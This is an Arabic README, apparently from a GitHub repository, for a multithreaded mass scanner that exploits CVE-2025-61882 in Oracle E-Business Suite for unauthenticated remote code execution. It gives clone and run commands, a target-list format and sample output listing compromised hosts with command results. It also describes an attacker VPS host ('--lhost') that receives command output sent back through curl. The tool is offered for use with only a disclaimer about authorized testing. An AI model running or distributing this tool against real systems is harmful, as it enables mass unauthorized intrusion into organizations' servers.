
# ماسح متعدد الخيوط لثغرة CVE-2025-61882 في Oracle E-Business Suite، يستغل تهريب طلبات HTTP لتحقيق تنفيذ برمجيات عن بُعد دون مصادقة والتحقق عبر مخرجات الأوامر.
أداة فحص جماعي سريعة ومتعددة الخيوط لاكتشاف CVE-2025-61882 في تثبيتات Oracle E-Business Suite. تسمح هذه الثغرة الحرجة بتنفيذ التعليمات البرمجية عن بُعد دون مصادقة.
id وتحليل المخرجاتvuln-output.txt فورًاpip install requests
هذا كل شيء. فقط Python 3.7+ ومكتبة requests.
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost YOUR_VPS_IP --threads 10
أنشئ ملف targets.txt مع عنوان URL واحد في كل سطر:
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Oracle E-Business Suite RCE Scanner (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 1235 targets from file
[*] Running with 20 concurrent threads
[*] Vulnerable hosts will be saved to vuln-output.txt
[*] [1/1235] Checking https://target1.com:443 on port 7893
[*] [2/1235] Checking https://target2.com:443 on port 5882
[+] Got one! 129.146.56.43 is vulnerable
[+] Command output: uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Scan finished in 245.67 seconds
[*] Found 3 vulnerable target(s)
[*] Check vuln-output.txt for full results
=================================================================
[+] Vulnerable targets found:
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
يتم حفظ النتائج في vuln-output.txt:
# Oracle EBS CVE-2025-61882 - Scan Results
# Started: Tue Oct 07 15:30:45 2025
# Total targets: 1235
# Scanner by: Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id ويرسل المخرجات مرة أخرى عبر curluid=...gid=...هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. دائمًا:
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني.
وجدت خطأ؟ لديك طلب ميزة؟
git checkout -b feature/amazing-feature)git commit -m 'Add some feature')git push origin feature/amazing-feature)هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.
هذه الأداة مقدمة لأغراض تعليمية واختبارات الأمان المصرح بها فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة. استخدمها على مسؤوليتك الخاصة.
الموقع الإلكتروني • تويتر • لينكد إن
صُنع بـ ❤️ لمجتمع أمن المعلومات
| الوسيط | مطلوب | الافتراضي | الوصف |
|---|
--targets | نعم | - | مسار الملف الذي يحتوي على عناوين URL للأهداف |
--lhost | نعم | - | عنوان IP الخاص بـ VPS/المهاجم |
--threads | لا | 20 | عدد الخيوط المتزامنة |